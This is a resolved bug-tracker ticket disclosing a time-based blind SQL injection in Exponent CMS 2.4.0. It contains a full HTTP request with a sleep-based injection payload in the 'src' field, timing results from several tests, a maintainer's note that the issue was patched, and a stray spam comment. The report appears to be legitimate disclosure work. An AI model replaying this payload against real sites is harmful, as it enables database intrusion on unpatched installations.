#1390 ✓resolved
Nicky

Blind SQL Injection Vulnerability in Exponent CMS 2.4.0

Reported by Nicky | November 4th, 2016 @ 02:32 AM | in 2.4.1 (closed)

POST /exponent/index.php HTTP/1.1
Content-Length: 865
Content-Type: multipart/form-data; boundary=-----Boundary_GXLNYFRMTV
X-Requested-With: XMLHttpRequest
Referer: http://192.168.118.1:80/exponent/
Cookie: PHPSESSID=671871947f2a01e5a385139b4131c7c1; adminer_key=9481c8797fb634e88f45043b9f1590fe; osp=0000
Host: 192.168.118.1
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: /
Content-Type: multipart/form-data; boundary=-----Boundary_GVJVYRLGSF

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="action"

update
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="body"

1
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="controller"

text
-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="id"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="int"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="rank"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="revision_id"

-------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="src"

(select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ -------Boundary_GVJVYRLGSF Content-Disposition: form-data; name="title"

Mr.
-------Boundary_GVJVYRLGSF--

POST (multipart) input src was set to (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/

Tests performed:
(select(0)from(select(sleep(6)))v)/*'+(select(0)from(select(sleep(6)))v)+'"+(select(0)from(select(sleep(6)))v)+"*/ => 18.377 s (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 12.683 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.437 s (select(0)from(select(sleep(2)))v)/*'+(select(0)from(select(sleep(2)))v)+'"+(select(0)from(select(sleep(2)))v)+"*/ => 6.349 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.624 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.967 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.998 s (select(0)from(select(sleep(4)))v)/*'+(select(0)from(select(sleep(4)))v)+'"+(select(0)from(select(sleep(4)))v)+"*/ => 13.104 s (select(0)from(select(sleep(0)))v)/*'+(select(0)from(select(sleep(0)))v)+'"+(select(0)from(select(sleep(0)))v)+"*/ => 0.234 s

Original value: @footer

Comments and changes to this ticket

  • dleffler

    dleffler November 4th, 2016 @ 07:59 AM

    • State changed from “new” to “resolved”
    • Assigned user changed from “expNinja” to “dleffler”
    • Milestone set to 2.4.1

    This has already been addressed in the pre-release code 'develop' branch which will be released as 2.4.0patch1 today.

  • meave390

    meave390 August 22nd, 2020 @ 03:47 PM

    Just look at this amazing post forever here see Play Sudoku online hope you guys start to be great fun forever here thanks ti given me

Please Sign in or create a free account to add a new ticket.

With your very own profile, you can contribute to projects, track your activity, watch tickets, receive and update tickets through your email and much more.

New-ticket Create new ticket

Create your profile

Help contribute to this project by taking a few moments to create your personal profile. Create your profile ยป

Bug Tracker for Exponent CMS

Shared Ticket Bins

People watching this ticket

Pages